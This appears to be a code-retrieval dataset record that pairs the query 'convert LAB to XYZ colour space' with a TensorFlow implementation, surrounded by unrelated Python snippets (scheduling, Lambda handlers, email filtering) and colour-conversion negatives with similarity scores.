[ "def lambda_handler(event, context):\n logging.info('Starting function with context=%s and event=%s', context, event)\n holiday_schedule = trash.holidayschedule()\n old_holiday_schedule = trash_service.list()['data']\n old_holidays = [old_holiday['name'] for old_holiday in old_holiday_schedule]\n logging.info('Updating holiday schedule with schedule=%s', holiday_schedule)\n update_schedule(old_holidays, holiday_schedule)", "def delete_UI_transaction_day(account):\n\t_day = read_day()\n\tdeleted = delete_transaction_day(account, _day)\n\tif (not deleted):\n\t\tprint('Nu s-a efectuat nici o stergere.')\n\telse:\n\t\tprint('Stergere finalizata.')", "def on_delete(self, req, resp):\n try:\n days_to_retain = int(req.params[\"days\"])\n except Exception:\n days_to_retain = 90\n\n try:\n retention_status = self.state_manager.task_retention(\n retain_days=str(days_to_retain))\n if not retention_status:\n resp.status = falcon.HTTP_404\n return\n resp.text = \"Tables purged successfully.\"\n except Exception as e:\n self.error(req.context, \"Unknown error: %s\" % (str(e)))\n resp.text = \"Unexpected error.\"\n resp.status = falcon.HTTP_500\n return\n resp.status = falcon.HTTP_200", "def do_rt(self, arg):\n self.do_timesheet('report today')", "def do_upt(self, arg):\n self.do_timesheet('update today')", "def reminders_soon(request):\n now = timezone.now()\n soon = now + timedelta(days=2)\n return Task.objects.filter(\n user=request.user, reminder__lt=soon, reminder_seen=False, done=False).exclude(folder='trash')", "def next_regular_trash_day(date: str) -> str:\n parsed_date = parser.parse(date)\n day_of_week = parsed_date.weekday()\n\n if day_of_week < TRASH_DAY:\n delta = TRASH_DAY - day_of_week\n elif day_of_week == TRASH_DAY:\n delta = 0\n else:\n delta = 7 - (day_of_week - TRASH_DAY)\n\n next_trash_date = parsed_date + datetime.timedelta(days=delta)\n return next_trash_date.strftime('%Y-%m-%d')", "def test_calendar_query_todo_alarm(self):\n raise SkipTest(\"test unimplemented\")", "def weekday(self, *args, **kwargs): # real signature unknown\r\n pass", "def delete_events(usrservice,calservice):\r\n print(args.action, args.inuser, 'celendar events')", "def lambda_handler(event, context):\n try:\n day = datetime.datetime.now().weekday()\n\n fetcher = assume_role()\n config = fetch_config_from_s3(fetcher)\n print config\n\n if is_weekday(day, config['schedule']['halfDay']):\n client = assume_role()\n for role_arn in config['role_arns']:\n account_number = role_arn.split(\":\")[4]\n ec2_user = create_temp_user(client, role_arn)\n\n start_up_time, stop_time, now, tz = convert_to_datetime(config['times'])\n logger.info(\"Lambda started for account : {}\".format(config['account_names'][account_number]))\n start_stop(now, start_up_time, stop_time, ec2_user, config, tz)\n else:\n logger.info(\"I do not operate on weekends.\")\n except Exception as error:\n logger.info(\"Lambda failed to run with the following error : {}\".format(error))", "def next_trash_day(date: str, holidays: list) -> dict:\n next_regular = next_regular_trash_day(date)\n weekdays = get_weekdays(next_regular)\n default_trash_day = {'type': 'default', 'schedule': calendar.day_name[TRASH_DAY]}\n if holiday.contains_holiday(weekdays):\n holiday_name = holiday.get_holiday(weekdays)\n find_holiday = list(filter(lambda holiday_delays: holiday_delays['name'] == holiday_name, holidays))\n if len(find_holiday) > 0:\n trash_day = {'type': 'holiday', 'holiday': holiday_name, 'schedule': find_holiday[0]['routeDelays']}\n else:\n trash_day = default_trash_day\n else:\n trash_day = default_trash_day\n\n return trash_day", "def get_day():\n return handle_invalid_inputs(question_4, days)", "def del_calender_event():\n return jsonify(None)", "def call_fut(self, node):\r\n fut = duedate.get_extended_due_date\r\n return fut(node)", "def day_of_the_week(arg):", "def lambda_handler(event, context):\n if event.get('zipcode') and event.get('country') and event.get('job'):\n data = get_current_temperature(event['zipcode'], event['country'])\n send_to_badash(event['job'], data)\n else:\n print('Error: no zipcode and/or country and/or job supplied!')\n exit(-1)", "def one_day(status, after):\n return woo.fetch_all_orders(status, after)", "def schedule_handler(userdata, *args):\n\t\tfor event in database.devschedule(userdata[\"cursor\"], args[0]):\n\t\t\tprint(str(event))\n\t\t\n\t\tprint(\"\")", "def ticket_deleted(self, ticket):", "def fnight(var, wrapper, message):\n if var.PHASE != \"day\":\n wrapper.pm(messages[\"not_daytime\"])\n else:\n hurry_up(0, True)", "def todo(self):\n # sort events with eventid using datetime string\n pass", "def for_day_request_handler(handler_input: HandlerInput) -> Response:\n log.info(\n f\"forDay: session_attributes={handler_input.attributes_manager.session_attributes}\"\n )\n intent = handler_input.request_envelope.request.intent\n when = intent.slots.get(\"WHEN\")\n log.info(f\"forDay: when.value={when.value}\")\n if when.value:\n day = date_parser.parse(when.value)\n day = datetime(day.year, day.month, day.day)\n else:\n day = events.get_date()\n text = events.for_day(day)\n log.info(f\"forDay events for {day} = {text}\")\n\n return (\n handler_input.response_builder.speak(text)\n .set_card(SimpleCard(f\"Hillbrook events for {day.strftime('%A')}:\\n{text}\"))\n .set_should_end_session(True)\n .response\n )", "def getTrash(self):\n return self.trash", "def list_1day_renu(self,fday,tday):\n dayList = self._list_day(fday, tday)\n return zip(dayList,[self._get_ndays_renu(d,1) for d in dayList])", "def extra_tasks_for_today(self):\n localtz = tzlocal()\n datetime_today = datetime.fromtimestamp(rospy.get_rostime().to_sec(), tz=localtz)\n day_today = datetime_today.strftime(\"%A\")\n date_today = datetime_today.date()\n rospy.loginfo('Looking for daily tasks for %s, %s' % (day_today, date_today))\n \n eight_forty_five= time(8,45, tzinfo=localtz)\n eleven_thirty= time(11,30, tzinfo=localtz)\n fourteen_thirty=time(14,30, tzinfo=localtz)\n seventeen_fifteen= time(17,15, tzinfo=localtz)\n past_bedtime = time(23,59, tzinfo=localtz)\n \n # day_end = seventeen_fifteen\n day_end = past_bedtime\n\n\n\n metric_wps=['WayPoint13', 'WayPoint18', 'WayPoint9','WayPoint11','WayPoint5','WayPoint3'] \n object_learn_wps=['WayPoint13', 'WayPoint18', 'WayPoint9', 'WayPoint11'] \n object_search_wps=['WayPoint1', 'WayPoint2', 'WayPoint3']\n door_wps=['WayPoint7', 'WayPoint4']\n \n morning_start = eight_forty_five\n morning_duration = delta_between(eleven_thirty, morning_start)\n \n lunch_start = eleven_thirty\n lunch_duration = delta_between(fourteen_thirty, lunch_start)\n\n afternoon_start = fourteen_thirty\n afternoon_duration = delta_between(day_end, afternoon_start)\n\n tasks = []\n \n #door checks at fixed times (to evaluate system ability to do stuff at corret times)\n task=create_door_check_task(door_wps[0])\n start_time=datetime.combine(date_today, time(10,30, tzinfo=localtz))\n end_time = start_time+timedelta(seconds=30)\n task.start_after=rospy.Time(unix_time(start_time))\n task.end_before=rospy.Time(unix_time(end_time))\n tasks.append(task)\n \n task=create_door_check_task(door_wps[0])\n start_time=datetime.combine(date_today, time(13,30, tzinfo=localtz))\n end_time = start_time+timedelta(seconds=30)\n task.start_after=rospy.Time(unix_time(start_time))\n task.end_before=rospy.Time(unix_time(end_time))\n tasks.append(task)\n \n task=create_door_check_task(door_wps[0])\n start_time=datetime.combine(date_today, time(16,30, tzinfo=localtz))\n end_time = start_time+timedelta(seconds=30)\n task.start_after=rospy.Time(unix_time(start_time))\n task.end_before=rospy.Time(unix_time(end_time))\n tasks.append(task)\n \n \n #random tasks\n for i in range(4):\n #morning\n task=create_metric_map_task(random.choice(metric_wps))\n self.set_random_task_time(task, date_today, morning_start, morning_duration)\n tasks.append(task)\n \n task=create_door_check_task(random.choice(door_wps))\n self.set_random_task_time(task, date_today, morning_start, morning_duration)\n tasks.append(task)\n \n if i<3:\n task=create_object_learn_task(random.choice(object_learn_wps))\n self.set_random_task_time(task, date_today, morning_start, morning_duration)\n tasks.append(task)\n \n task=create_object_search_task(random.choice(object_search_wps))\n self.set_random_task_time(task, date_today, morning_start, morning_duration)\n tasks.append(task)\n \n #lunch (less tasks because we want the robot mostly learning people tracks)\n if i<1:\n task=create_metric_map_task(random.choice(metric_wps))\n self.set_random_task_time(task, date_today, lunch_start, lunch_duration)\n tasks.append(task)\n \n task=create_door_check_task(random.choice(door_wps))\n self.set_random_task_time(task, date_today, lunch_start, lunch_duration)\n tasks.append(task)\n \n task=create_object_learn_task(random.choice(object_learn_wps))\n self.set_random_task_time(task, date_today, lunch_start, lunch_duration)\n tasks.append(task)\n \n task=create_object_search_task(random.choice(object_search_wps))\n self.set_random_task_time(task, date_today, lunch_start, lunch_duration)\n tasks.append(task)\n \n \n #afternoon\n task=create_metric_map_task(random.choice(metric_wps))\n self.set_random_task_time(task, date_today, afternoon_start, afternoon_duration)\n tasks.append(task)\n \n task=create_door_check_task(random.choice(door_wps))\n self.set_random_task_time(task, date_today, afternoon_start, afternoon_duration)\n tasks.append(task)\n \n if i<3:\n task=create_object_learn_task(random.choice(object_learn_wps))\n self.set_random_task_time(task, date_today, afternoon_start, afternoon_duration)\n tasks.append(task)\n \n task=create_object_search_task(random.choice(object_search_wps))\n self.set_random_task_time(task, date_today, afternoon_start, afternoon_duration)\n tasks.append(task)\n return tasks", "def lambda_handler(event, content):\n imap = email_startup()\n status, messages = imap.select('Inbox')\n days_old = input('Enter many days ago do you want to use as the cutoff?: ')\n new_date = get_days_old(days_old)\n messages = apply_filter(imap, new_date)\n initial_unread = get_unread_count(imap)\n print(f'Initial unread emails: {initial_unread}')\n print(f'Emails to be filter: {len(messages)}')\n a_pause = input('Continue by pressing enter.')\n\n print(f'Processing {len(messages)} unread emails from before {new_date}')\n print(\"=\"*100)\n process_messages(imap, messages)\n print(\"=\"*100)\n\n # Determine results from script\n post_unread = get_unread_count(imap)\n print(f'Processed Emails: {initial_unread - post_unread}')\n print(f'After processing, there are {post_unread} unread emails.')\n\n # close the connection and logout\n imap.close()\n imap.logout()", "def day(d):\n\t\tx = db.cquery(\"day\",d)\n\t\tprint \"Total:\", x[0]\n\t\tf = raw_input(\"[L]ist [N]ew overview or [B]ack to home \").lower()\n\t\tif f == \"l\":\n\t\t\tfor i in x[1]:\n\t\t\t\tprint ui.statsid(), i[0], i[1], \" \", ui.statstimein(), i[2], ui.statstimeout(), i[3]\n\t\t\traw_input(\"[Enter] to go back to search\")\n\t\t\thome_stats()\n\t\telif f == \"n\":\n\t\t\thome_stats()\n\t\telif f == \"b\":\n\t\t\thome()\n\t\telse:\n\t\t\tpass", "def ENTRY(entry_code):\n\tif check_user(entry_code) ==True:\n\t\t###workday = Workday.objects.filter(date=get_time()).get()\n\t\tenter_workday(entry_code)", "def lambda_handler(event, context):\n # By default, treat the user request as coming from the America/New_York time zone.\n os.environ['TZ'] = 'America/New_York'\n time.tzset()\n #logger.debug('event.bot.name={}'.format(event['bot']['name']))\n\n return dispatch(event)" ]
[ "0.6090012", "0.54774374", "0.5461324", "0.5409436", "0.53761524", "0.53742063", "0.5331051", "0.5287995", "0.51901144", "0.5178555", "0.5161938", "0.5114322", "0.5079114", "0.50751776", "0.5070596", "0.50560266", "0.50401527", "0.50214356", "0.49688548", "0.49537805", "0.49516058", "0.4899427", "0.48943612", "0.48820135", "0.48690954", "0.48539737", "0.48517373", "0.48436627", "0.48372668", "0.48182443" ]
0.74920136
0
Convert an image from LAB color space to XYZ color space
def lab_to_xyz(image: tf.Tensor) -> tf.Tensor: l, a, b = tf.unstack(image, axis=-1) var_y = (l + 16) / 116 var_x = a / 500 + var_y var_z = var_y - b / 200 var_x = tf.where(tf.pow(var_x, 3) > 0.008856, tf.pow(var_x, 3), (var_x - 16 / 116) / 7.787) var_y = tf.where(tf.pow(var_y, 3) > 0.008856, tf.pow(var_y, 3), (var_y - 16 / 116) / 7.787) var_z = tf.where(tf.pow(var_z, 3) > 0.008856, tf.pow(var_z, 3), (var_z - 16 / 116) / 7.787) refx = 95.047 refy = 100.00 ref_z = 108.883 x = var_x * refx y = var_y * refy z = var_z * ref_z xyz_image = tf.stack([x, y, z], axis=-1) return xyz_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Lab_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n xyz_y = (cobj.lab_l + 16.0) / 116.0\r\n xyz_x = cobj.lab_a / 500.0 + xyz_y\r\n xyz_z = xyz_y - cobj.lab_b / 200.0\r\n \r\n if math.pow(xyz_y, 3) > color_constants.CIE_E:\r\n xyz_y = math.pow(xyz_y, 3)\r\n else:\r\n xyz_y = (xyz_y - 16.0 / 116.0) / 7.787\r\n\r\n if math.pow(xyz_x, 3) > color_constants.CIE_E:\r\n xyz_x = math.pow(xyz_x, 3)\r\n else:\r\n xyz_x = (xyz_x - 16.0 / 116.0) / 7.787\r\n \r\n if math.pow(xyz_z, 3) > color_constants.CIE_E:\r\n xyz_z = math.pow(xyz_z, 3)\r\n else:\r\n xyz_z = (xyz_z - 16.0 / 116.0) / 7.787\r\n \r\n xyz_x = (illum[\"X\"] * xyz_x)\r\n xyz_y = (illum[\"Y\"] * xyz_y)\r\n xyz_z = (illum[\"Z\"] * xyz_z)\r\n \r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)", "def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:\n r, g, b = tf.unstack(image, axis=-1)\n var_r = r / 255\n var_g = g / 255\n var_b = b / 255\n\n var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),\n var_r / 12.92)\n var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),\n var_g / 12.92)\n var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),\n var_b / 12.92)\n var_r = var_r * 100\n var_g = var_g * 100\n var_b = var_b * 100\n\n x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805\n y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722\n z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505\n\n image_xyz = tf.stack([x, y, z], axis=-1)\n return image_xyz", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def XYZ_to_Lab(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n temp_x = cobj.xyz_x / illum[\"X\"]\r\n temp_y = cobj.xyz_y / illum[\"Y\"]\r\n temp_z = cobj.xyz_z / illum[\"Z\"]\r\n \r\n if temp_x > color_constants.CIE_E:\r\n temp_x = math.pow(temp_x, (1.0 / 3.0))\r\n else:\r\n temp_x = (7.787 * temp_x) + (16.0 / 116.0) \r\n\r\n if temp_y > color_constants.CIE_E:\r\n temp_y = math.pow(temp_y, (1.0 / 3.0))\r\n else:\r\n temp_y = (7.787 * temp_y) + (16.0 / 116.0)\r\n \r\n if temp_z > color_constants.CIE_E:\r\n temp_z = math.pow(temp_z, (1.0 / 3.0))\r\n else:\r\n temp_z = (7.787 * temp_z) + (16.0 / 116.0)\r\n \r\n lab_l = (116.0 * temp_y) - 16.0\r\n lab_a = 500.0 * (temp_x - temp_y)\r\n lab_b = 200.0 * (temp_y - temp_z)\r\n return LabColor(\r\n lab_l, lab_a, lab_b, observer=cobj.observer, illuminant=cobj.illuminant)", "def rgb_to_lab(image: tf.Tensor) -> tf.Tensor:\n xyz = rgb_to_xyz(image)\n lab_image = xyz_to_lab(xyz)\n return lab_image", "def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:\n xyz = lab_to_xyz(image)\n rgb_image = xyz_to_rgb(xyz)\n return rgb_image", "def example_lab_to_xyz():\r\n\r\n print(\"=== Simple Example: Lab->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.22)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n xyz = convert_color(lab, XYZColor)\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def lin_a98rgb_to_xyz(rgb: Vector) -> Vector:\n\n return alg.dot(RGB_TO_XYZ, rgb, dims=alg.D2_D1)", "def xyz_to_lab(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n\n refx = 95.047\n refy = 100.00\n refz = 108.883\n\n var_x = x / refx\n var_y = y / refy\n var_z = z / refz\n\n var_x = tf.where(var_x > 0.008856, tf.pow(var_x, 1 / 3),\n (7.787 * var_x) + (16 / 116))\n var_y = tf.where(var_y > 0.008856, tf.pow(var_y, 1 / 3),\n (7.787 * var_y) + (16 / 116))\n var_z = tf.where(var_z > 0.008856, tf.pow(var_z, 1 / 3),\n (7.787 * var_z) + (16 / 116))\n\n l = (116 * var_y) - 16\n a = 500 * (var_x - var_y)\n b = 200 * (var_y - var_z)\n lab_image = tf.stack([l, a, b], axis=-1)\n return lab_image", "def rgb_to_xyz(rgb_color):\n\n r = (rgb_color[0] / 255)\n g = (rgb_color[1] / 255)\n b = (rgb_color[2] / 255)\n\n if r > 0.04045:\n r = ((r + 0.055) / 1.055) ** 2.4\n else:\n r = r / 12.92\n\n if g > 0.04045:\n g = ((g + 0.055) / 1.055) ** 2.4\n else:\n g = g / 12.92\n\n if b > 0.04045:\n b = ((b + 0.055) / 1.055) ** 2.4\n else:\n b = b / 12.92\n\n r = r * 100\n g = g * 100\n b = b * 100\n x = (r * 0.4124) + (g * 0.3576) + (b * 0.1805)\n y = (r * 0.2126) + (g * 0.7152) + (b * 0.0722)\n z = (r * 0.0193) + (g * 0.1192) + (b * 0.9505)\n\n return x, y, z", "def RGB_to_XYZ(RGB,\n illuminant_RGB,\n illuminant_XYZ,\n RGB_to_XYZ_matrix,\n chromatic_adaptation_transform='CAT02',\n decoding_cctf=None):\n\n if decoding_cctf is not None:\n RGB = decoding_cctf(RGB)\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n transform=chromatic_adaptation_transform)\n\n XYZ = dot_vector(RGB_to_XYZ_matrix, RGB)\n\n XYZ_a = dot_vector(M, XYZ)\n\n return XYZ_a", "def RGB_to_XYZ_matrix(self):\n\n if not self._use_derived_RGB_to_XYZ_matrix:\n return self._RGB_to_XYZ_matrix\n else:\n return self._derived_RGB_to_XYZ_matrix", "def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n var_x = x / 100\n var_y = y / 100\n var_z = z / 100\n\n var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986\n var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415\n var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570\n\n var_r = tf.where(var_r > 0.0031308,\n 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055,\n 12.92 * var_r)\n var_g = tf.where(var_g > 0.0031308,\n 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055,\n 12.92 * var_g)\n var_b = tf.where(var_b > 0.0031308,\n 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055,\n 12.92 * var_b)\n r = var_r * 255\n g = var_g * 255\n b = var_b * 255\n rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8)\n return rgb_image", "def hlab_to_xyz(hlab: Vector, white: VectorLike) -> Vector:\n\n xn, yn, zn = alg.multiply(util.xy_to_xyz(white), 100, dims=alg.D1_SC)\n ka = CKA * alg.nth_root(xn / CXN, 2)\n kb = CKB * alg.nth_root(zn / CZN, 2)\n l, a, b = hlab\n l /= 100\n y = (l ** 2) * yn\n x = (((a * l) / ka) + (y / yn)) * xn\n z = (((b * l) / kb) - (y / yn)) * -zn\n return alg.divide([x, y, z], 100, dims=alg.D1_SC)", "def lab_to_rgb(img):\n new_img = np.zeros((256, 256, 3))\n for i in range(len(img)):\n for j in range(len(img[i])):\n pix = img[i, j]\n new_img[i, j] = [(pix[0] + 1) * 50, (pix[1] + 1) / 2 * 255 - 128, (pix[2] + 1) / 2 * 255 - 128]\n new_img = color.lab2rgb(new_img) * 255\n new_img = new_img.astype('uint8')\n return new_img", "def colorize_xyz(xyz):\n xyz_vis = xyz - xyz.min()\n return (255 * xyz_vis / xyz_vis.max()).astype(np.uint8)", "def rgb2alpha(img):\n\t### First of all we need the size of our picture to make the transforms\n\n\tx = len(img) ; y = len(img[0])\n\talpha = np.full((x, y, 3), 0, dtype = float)\t\t## This will be the transformed image\n\n\t### Now we gotta access each pixel of the picture\n\n\tfor i, vi in enumerate(img):\n\t\tfor j, px in enumerate(vi):\n\t\t\t### There we are\n\n\t\t\t# Step 1 : LMS transform, for that we use r_l\n\n\t\t\talpha[i][j] = np.matmul(r_l, px)\n\n\t\t\t# Step 2 : log em all (decimal log)\n\n\t\t\talpha[i][j][0] = log(alpha[i][j][0])\n\t\t\talpha[i][j][1] = log(alpha[i][j][1])\n\t\t\talpha[i][j][2] = log(alpha[i][j][2])\n\n\t\t\t# Step 3 : l alpha beta transform, by using l_a\n\n\t\t\talpha[i][j] = np.matmul(l_a, alpha[i][j])\n\n\treturn alpha", "def Luv_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n # Without Light, there is no color. Short-circuit this and avoid some\r\n # zero division errors in the var_a_frac calculation.\r\n if cobj.luv_l <= 0.0:\r\n xyz_x = 0.0\r\n xyz_y = 0.0\r\n xyz_z = 0.0\r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)\r\n\r\n # Various variables used throughout the conversion.\r\n cie_k_times_e = color_constants.CIE_K * color_constants.CIE_E\r\n u_sub_0 = (4.0 * illum[\"X\"]) / (illum[\"X\"] + 15.0 * illum[\"Y\"] + 3.0 * illum[\"Z\"])\r\n v_sub_0 = (9.0 * illum[\"Y\"]) / (illum[\"X\"] + 15.0 * illum[\"Y\"] + 3.0 * illum[\"Z\"])\r\n var_u = cobj.luv_u / (13.0 * cobj.luv_l) + u_sub_0\r\n var_v = cobj.luv_v / (13.0 * cobj.luv_l) + v_sub_0\r\n\r\n # Y-coordinate calculations.\r\n if cobj.luv_l > cie_k_times_e:\r\n xyz_y = math.pow((cobj.luv_l + 16.0) / 116.0, 3.0)\r\n else:\r\n xyz_y = cobj.luv_l / color_constants.CIE_K\r\n\r\n # X-coordinate calculation.\r\n xyz_x = xyz_y * 9.0 * var_u / (4.0 * var_v)\r\n # Z-coordinate calculation.\r\n xyz_z = xyz_y * (12.0 - 3.0 * var_u - 20.0 * var_v) / (4.0 * var_v)\r\n\r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, illuminant=cobj.illuminant, observer=cobj.observer)", "def linear_rgb2xyz(rgb):\n arr = _prepare_colorarray(rgb).copy()\n return _convert(xyz_from_rgb, arr)", "def rgb_to_xy(red, green, blue):\n\n # gamma correction\n red = pow((red + 0.055) / (1.0 + 0.055), 2.4) if red > 0.04045 else (red / 12.92)\n green = pow((green + 0.055) / (1.0 + 0.055), 2.4) if green > 0.04045 else (green / 12.92)\n blue = pow((blue + 0.055) / (1.0 + 0.055), 2.4) if blue > 0.04045 else (blue / 12.92)\n\n # convert rgb to xyz\n x = red * 0.649926 + green * 0.103455 + blue * 0.197109\n y = red * 0.234327 + green * 0.743075 + blue * 0.022598\n z = green * 0.053077 + blue * 1.035763\n\n # convert xyz to xy\n x = x / (x + y + z)\n y = y / (x + y + z)\n\n # TODO check color gamut if known\n \n return [x, y]", "def RGB_to_XYZ_matrix(self, value):\n\n if value is not None:\n value = np.asarray(value)\n self._RGB_to_XYZ_matrix = value", "def rgb_image(self):\n z3 = self.z[:,:,newaxis]\n return z3 * self.c", "def sRGBFromLab(lab):\n return xyzTosRGB(labToXYZ(lab, [0.9504559, 1, 1.089058]))", "def convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def _convert_to_yolo_img(self, img):\n\n img = img / 255.0\n h, w, c = img.shape\n img = img.transpose(2, 0, 1)\n outimg = make_image(w, h, c)\n img = img.reshape((w*h*c))\n data = c_array(c_float, img)\n outimg.data = data\n rgbgr_image(outimg)\n return outimg", "def lab_to_rgb(img_l, img_ab):\n lab = np.empty([*img_l.shape[0:2], 3])\n lab[:, :, 0] = np.squeeze(((img_l + 1) * 50))\n lab[:, :, 1:] = img_ab * 127\n return color.lab2rgb(lab)", "def test_srgb_conversion_to_xyz_d65(self):\r\n\r\n xyz = convert_color(self.color, XYZColor)\r\n self.assertColorMatch(xyz, XYZColor(0.294, 0.457, 0.103))", "def test_srgb_conversion_to_xyz_d50(self):\r\n\r\n xyz = convert_color(self.color, XYZColor, target_illuminant='D50')\r\n self.assertColorMatch(xyz, XYZColor(0.313, 0.460, 0.082))", "def rgb2Lab(rgbvalue):\r\n RGB2Lab_Matrix = np.array([[0.412453, 0.357580, 0.180423],\r\n [0.212671, 0.715160, 0.072169],\r\n [0.019334, 0.119193, 0.950227]])\r\n R = rgbvalue[0]\r\n G = rgbvalue[1]\r\n B = rgbvalue[2]\r\n gammaR = gamma(R / 255.0)\r\n gammaG = gamma(G / 255.0)\r\n gammaB = gamma(B / 255.0)\r\n RGBvalue = np.array([gammaR, gammaG, gammaB])\r\n RGBvalue = RGBvalue.reshape(3, 1)\r\n XYZvalue = np.dot(RGB2Lab_Matrix, RGBvalue)\r\n assert XYZvalue.shape == (3, 1)\r\n correction = np.array([[1.0 / 0.950456, 1.0, 1.0 / 1.088754]]).T\r\n assert correction.shape == (3, 1)\r\n XYZ = XYZvalue * correction\r\n assert XYZ.shape == (3, 1)\r\n YYn = ft(XYZ[1])\r\n XXn = ft(XYZ[0])\r\n ZZn = ft(XYZ[2])\r\n L = 116 * YYn - 16\r\n a = 500 * (XXn - YYn)\r\n b = 200 * (YYn - ZZn)\r\n return [int(L), int(a), int(b)]", "def test_adobe_conversion_to_xyz_d50(self):\r\n\r\n adobe = AdobeRGBColor(0.482, 0.784, 0.196)\r\n xyz = convert_color(adobe, XYZColor, target_illuminant='D50')\r\n self.assertColorMatch(xyz, XYZColor(0.247, 0.431, 0.060))" ]
[ "0.72538626", "0.6935359", "0.6835545", "0.6804529", "0.6711759", "0.66599464", "0.6521106", "0.64231324", "0.6351376", "0.63161516", "0.62939584", "0.62429935", "0.6191677", "0.6155172", "0.6133433", "0.60679656", "0.605217", "0.600619", "0.6003839", "0.5994653", "0.5972754", "0.59319156", "0.590566", "0.5903485", "0.59027094", "0.5897333", "0.5878697", "0.5873358", "0.5862743", "0.5847499" ]
0.72095025
1
Convert an image from XYZ color space to RGB color space
def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor: x, y, z = tf.unstack(image, axis=-1) var_x = x / 100 var_y = y / 100 var_z = z / 100 var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986 var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415 var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570 var_r = tf.where(var_r > 0.0031308, 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055, 12.92 * var_r) var_g = tf.where(var_g > 0.0031308, 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055, 12.92 * var_g) var_b = tf.where(var_b > 0.0031308, 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055, 12.92 * var_b) r = var_r * 255 g = var_g * 255 b = var_b * 255 rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8) return rgb_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def XYZ_to_RGB(XYZ,\n illuminant_XYZ,\n illuminant_RGB,\n XYZ_to_RGB_matrix,\n chromatic_adaptation_transform='CAT02',\n encoding_cctf=None):\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n transform=chromatic_adaptation_transform)\n\n XYZ_a = dot_vector(M, XYZ)\n\n RGB = dot_vector(XYZ_to_RGB_matrix, XYZ_a)\n\n if encoding_cctf is not None:\n RGB = encoding_cctf(RGB)\n\n return RGB", "def rgb_image(self):\n z3 = self.z[:,:,newaxis]\n return z3 * self.c", "def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:\n xyz = lab_to_xyz(image)\n rgb_image = xyz_to_rgb(xyz)\n return rgb_image", "def get_rgb(self, img, r, g, b):\r\n\r\n # Get specific bands of hyperspectral image\r\n red_channel = img[:, :, r]\r\n green_channel = img[:, :, g]\r\n blue_channel = img[:, :, b]\r\n\r\n img = np.stack((red_channel, green_channel, blue_channel), axis=2)\r\n img = img.astype('float32')\r\n return img", "def rgb_processing(rgb_img, center, scale, rot=0):\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img", "def convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = 